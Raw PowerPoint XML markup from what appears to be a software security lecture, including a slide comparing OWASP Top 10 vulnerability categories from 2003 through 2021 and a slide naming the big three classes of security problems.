                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control / authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008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1196752"/>
            <a:ext cx="4030290" cy="5112568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C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-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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t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q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>u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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o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g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y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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C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F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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008000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rgbClr val="008000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00800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00800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1124744"/>
            <a:ext cx="4034606" cy="5040560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00800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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p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r 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s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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c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00800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o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00800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 o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00800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 X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a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00800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y 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00800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c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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X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00800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v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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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>
                <a:solidFill>
                  <a:srgbClr val="00800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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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>
                <a:solidFill>
                  <a:srgbClr val="00800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00800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0080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312E1EBE-BC53-B26A-777E-87A6DAE3B69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95389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7A57B-BD83-DB78-666C-5F7D56FD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three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71A705-78C5-A8EC-322E-FE88EA48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big three classes of security problems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memory corruption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access control   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incl.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authentication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insecure input handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0"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3CE7-4652-E7EC-9436-2877552EC25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42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1232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0F0313-5D63-CA71-FDA7-1BFF3CD76874}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="251520" y="875581"/>
            <a:ext cx="8639100" cy="5433739"/>
            <a:chOff x="251520" y="875581"/>
            <a:chExt cx="8639100" cy="5727600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="141" name="Connector: Curved 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947FC42F-8715-22DB-C522-0F003FC16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3823" y="1371121"/>
              <a:ext cx="416700" cy="221768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stomShape 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251520" y="1136581"/>
              <a:ext cx="108144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Unvalidated Input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0" name="CustomShape 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739400" y="1136581"/>
              <a:ext cx="110340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XSS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1" name="CustomShape 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3255733" y="1136581"/>
              <a:ext cx="110124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2" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281880" y="1136581"/>
              <a:ext cx="10969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3" name="CustomShape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4767720" y="1136581"/>
              <a:ext cx="109908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4" name="CustomShape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7795500" y="1136581"/>
              <a:ext cx="10951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Access Control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5" name="CustomShape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251520" y="1691861"/>
              <a:ext cx="10814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</a:rPr>
                <a:t>Broken Access Control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CustomShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739400" y="1691861"/>
              <a:ext cx="110340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7" name="CustomShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3255733" y="1690141"/>
              <a:ext cx="110124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XSS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8" name="CustomShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281880" y="1691861"/>
              <a:ext cx="10969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Authentication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9" name="CustomShape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4767720" y="1691861"/>
              <a:ext cx="109908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Auth. &amp; Session Mngt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0" name="CustomShape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7795500" y="1692941"/>
              <a:ext cx="109512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Cryptographic Failures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1" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251520" y="2247141"/>
              <a:ext cx="10814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DejaVu Sans"/>
                </a:rPr>
                <a:t>Broken Auth. &amp; Session Mngt.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CustomShape 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739400" y="2247141"/>
              <a:ext cx="110340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Malicious File Execution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3" name="CustomShape 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3255733" y="2243701"/>
              <a:ext cx="11012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Auth. &amp; Session Mngt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4" name="CustomShape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281880" y="2247141"/>
              <a:ext cx="109692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Sensitive Data Exposure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5" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4767720" y="2247141"/>
              <a:ext cx="109908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XSS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6" name="CustomShape 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7795500" y="2249301"/>
              <a:ext cx="10951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7" name="CustomShape 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251520" y="2801461"/>
              <a:ext cx="108144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XSS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8" name="CustomShape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739400" y="2801461"/>
              <a:ext cx="110340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IDOR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9" name="CustomShape 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3255733" y="2797261"/>
              <a:ext cx="11012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IDOR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0" name="CustomShape 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4767720" y="2802421"/>
              <a:ext cx="109908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IDOR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1" name="CustomShape 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7795500" y="2801461"/>
              <a:ext cx="1095120" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="pct5">
              <a:fgClr>
                <a:srgbClr val="FFE575"/>
              </a:fgClr>
              <a:bgClr>
                <a:srgbClr val="008000"/>
              </a:bgClr>
            </a:patt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</a:t>
              </a:r>
              <a:b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</a:b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Design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2" name="CustomShape 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="252240" y="3354261"/>
              <a:ext cx="1080000" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C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Buffer Overflows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3" name="CustomShape 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739400" y="3354261"/>
              <a:ext cx="110340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CSRF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4" name="CustomShape 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3255733" y="3350821"/>
              <a:ext cx="11012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CSRF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5" name="CustomShape 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281880" y="3354261"/>
              <a:ext cx="10969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Access Control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8" name="CustomShape 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251520" y="3908681"/>
              <a:ext cx="108144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Injection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9" name="CustomShape 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739940" y="3908681"/>
              <a:ext cx="1102320" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0066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Info Leakage &amp; Improper Error Handling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0" name="CustomShape 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3255733" y="3904381"/>
              <a:ext cx="1101240" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0066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Security Misconfiguration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2" name="CustomShape 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4767720" y="3912981"/>
              <a:ext cx="109908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Sensitive Data Exposure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3" name="CustomShape 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7795500" y="3908681"/>
              <a:ext cx="1095120" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B4C7D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Vulnerable &amp; outdated components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4" name="CustomShape 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251520" y="4463101"/>
              <a:ext cx="1081440" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0066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Improper Error Handling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5" name="CustomShape 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739400" y="4463101"/>
              <a:ext cx="110340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Broken Auth. &amp; Session Mngt.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6" name="CustomShape 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3256093" y="4457941"/>
              <a:ext cx="110052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Cryptographic Storage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7" name="CustomShape 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6288268" y="4473692"/>
              <a:ext cx="10969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XSS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8" name="CustomShape 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4767720" y="4468261"/>
              <a:ext cx="109908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Missing </a:t>
              </a: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function</a:t>
              </a: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 level access control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9" name="CustomShape 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7795500" y="4463101"/>
              <a:ext cx="10951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Identification &amp; Authentication Failures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0" name="CustomShape 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251520" y="5022461"/>
              <a:ext cx="108144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Storage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1" name="CustomShape 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739400" y="5022461"/>
              <a:ext cx="1103400" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCC9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Cryptographic Storage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2" name="CustomShape 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3255733" y="5011501"/>
              <a:ext cx="11012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Failure to restrict URL access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3" name="CustomShape 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281880" y="5022461"/>
              <a:ext cx="10969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Deserialization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4" name="CustomShape 46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4767720" y="5023541"/>
              <a:ext cx="109908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CSRF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5" name="CustomShape 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7795500" y="5022461"/>
              <a:ext cx="10951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Software &amp; Data Integrity Failures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6" name="CustomShape 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21567600">
              <a:off x="251520" y="5571230"/>
              <a:ext cx="1081440" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DDDDDD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Denial of Service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7" name="CustomShape 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739400" y="5571230"/>
              <a:ext cx="1103400" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF7B5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Communication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8" name="CustomShape 50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3255733" y="5565061"/>
              <a:ext cx="1101240" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF7B5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Transport Layer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9" name="CustomShape 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281880" y="5571230"/>
              <a:ext cx="1096920" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B4C7D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Components with known vulnerabilities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0" name="CustomShape 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4767720" y="5578821"/>
              <a:ext cx="1099080" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B4C7DC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Components with known vulnerabilities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1" name="CustomShape 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7795500" y="5571230"/>
              <a:ext cx="10951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Yu Mincho Demibold" panose="02020600000000000000" pitchFamily="18" charset="-128"/>
                </a:rPr>
                <a:t>Insufficient Logging &amp; Monitoring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Yu Mincho Demibold" panose="02020600000000000000" pitchFamily="18" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="CustomShape 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251520" y="6134101"/>
              <a:ext cx="1081440" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF7B5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Insecure Configuration  Management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3" name="CustomShape 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1739400" y="6134101"/>
              <a:ext cx="110340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Failure to restrict URL access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4" name="CustomShape 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3255733" y="6118621"/>
              <a:ext cx="110124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Unvalidated Redirects and Forwards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5" name="CustomShape 57"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281880" y="6134101"/>
              <a:ext cx="109692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Insufficient Logging &amp; Monitoring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6" name="CustomShape 58"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4767720" y="6134101"/>
              <a:ext cx="1099080" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="008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Unvalidated Redirects and Forwards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7" name="CustomShape 59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7795500" y="6134101"/>
              <a:ext cx="10951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SSR</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" spc="-1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="DejaVu Sans"/>
                </a:rPr>
                <a:t>F</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-GB" sz="1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9" name="CustomShape 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281880" y="2801461"/>
              <a:ext cx="1096920" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFE575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XXE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1" name="CustomShape 103"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531420" y="87558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2003</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-GB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2" name="CustomShape 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8082240" y="88170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2021</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-GB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3" name="CustomShape 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6569520" y="87558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2017</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-GB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4" name="CustomShape 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5056440" y="88170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2013</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-GB" sz="1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5" name="CustomShape 107"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3545533" y="88170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2010</a:t>
              </a:r>
              <a:endPara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6" name="CustomShape 108"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2030280" y="881701"/>
              <a:ext cx="521640" cy="26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2007</a:t>
              </a:r>
              <a:endPara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CustomShape 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8279B7E0-29CD-CAF3-9F50-4EBB633A2747}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4758720" y="3361621"/>
              <a:ext cx="1101240" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0066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Security Misconfiguration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CustomShape 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02B57E2B-AAEF-3D4F-0FE4-982EAC4C503E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6288268" y="3923327"/>
              <a:ext cx="1101240" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0066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Security Misconfiguration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CustomShape 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD8971A-CDBC-F1E3-289E-A725BA83700A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7780920" y="3341840"/>
              <a:ext cx="1101240" cy="469080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="pct5">
              <a:fgClr>
                <a:srgbClr val="FFE575"/>
              </a:fgClr>
              <a:bgClr>
                <a:srgbClr val="006600"/>
              </a:bgClr>
            </a:patt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US" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-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</a:rPr>
                <a:t>Security Misconfiguration</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-GB" sz="9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4F61D9F7-D1B5-7BF0-0298-2625B0CAEBDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="116" idx="3"/>
              <a:endCxn id="111" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2842800" y="1371121"/>
              <a:ext cx="412933" cy="55528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08015679-E0C0-BD84-0C63-0C55AFAFB6CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="112" idx="3"/>
              <a:endCxn id="126" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7378800" y="1371121"/>
              <a:ext cx="416700" cy="111272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15F6A470-8489-568B-4C7E-4B82490DB623}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="125" idx="3"/>
              <a:endCxn id="147" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5866800" y="2481681"/>
              <a:ext cx="421468" cy="222655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C57184BF-C1CB-E802-05D1-86416470B2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7827" y="2588490"/>
              <a:ext cx="432000" cy="21600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6545BBFB-F235-2CA9-EF34-4FE07838745B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4359133" y="1936501"/>
              <a:ext cx="410747" cy="5570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047792ED-3F1B-6E82-F7BE-CCDC5941384E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2856816" y="1400135"/>
              <a:ext cx="410747" cy="557000"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 21459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C3D228B7-FACE-BDEF-8822-C802E46DE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371" y="4740121"/>
              <a:ext cx="468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CC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or: Curved 104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E7E23D-C462-C233-4B6F-7B56E7C16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4958" y="5246041"/>
              <a:ext cx="432000" cy="11226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or: Curved 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA05E3D9-EB2D-06B8-B0BA-F7677B51D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8497" y="4699088"/>
              <a:ext cx="401747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or: Curved 217">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0313212-C38C-4A60-30D7-D53582C0A02D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1296230" y="2481681"/>
              <a:ext cx="432000" cy="2215960"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 26925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or: Curved 221">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1A5199A-5EDA-28D9-DAEE-6C466B7C79AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="115" idx="3"/>
